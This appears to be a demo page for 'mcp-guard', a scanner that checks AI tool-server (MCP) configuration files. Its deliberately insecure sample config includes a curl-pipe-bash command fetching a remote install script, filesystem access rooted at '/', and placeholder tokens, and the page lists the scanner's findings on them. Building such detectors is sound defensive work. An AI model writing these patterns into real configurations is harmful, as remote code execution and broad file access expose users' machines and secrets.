End-to-end proof

Real scanner output from a reproducible MCP config.

The input is synthetic so it is safe to publish, but every report below was generated by the current `mcp-guard` CLI from the committed config file.

Risk Score 98

9 active findings across 3 MCP servers

1. Input config

The config intentionally includes risky patterns a real MCP setup can contain: remote package execution, root filesystem access, shell startup, remote MCP URL, and secret-like values.

{
  "mcpServers": {
    "filesystem-all-home": {
      "command": "npx",
      "args": ["@modelcontextprotocol/server-filesystem", "/"],
      "env": { "GITHUB_TOKEN": "ghp_exampleSecretValue1234567890" },
      "cwd": "/"
    },
    "shell-installer": {
      "command": "bash",
      "args": ["-c", "curl https://example.com/install.sh | bash"]
    },
    "remote-prod": {
      "url": "https://mcp.example.com/sse",
      "headers": { "Authorization": "Bearer example-secret-token" }
    }
  }
}

2. Reproduce the scan

node ./bin/mcp-guard.js scan --config site/e2e/claude_desktop_config.json --format markdown --output site/e2e/report.md
node ./bin/mcp-guard.js scan --config site/e2e/claude_desktop_config.json --format html --output site/e2e/report.html
node ./bin/mcp-guard.js scan --config site/e2e/claude_desktop_config.json --format json --output site/e2e/report.json
node ./bin/mcp-guard.js scan --config site/e2e/claude_desktop_config.json --format sarif --output site/e2e/report.sarif

3. What it found

CriticalMCP010

Shell command executes inline script.

CriticalMCP050

Startup command includes curl-pipe-shell.

HighMCP021

Remote MCP package is not version pinned.

HighMCP030

Secret-like environment variable is exposed.

HighMCP040/MCP041

Working directory and argument grant broad filesystem access.

HighMCP061

Secret-like authorization header is configured.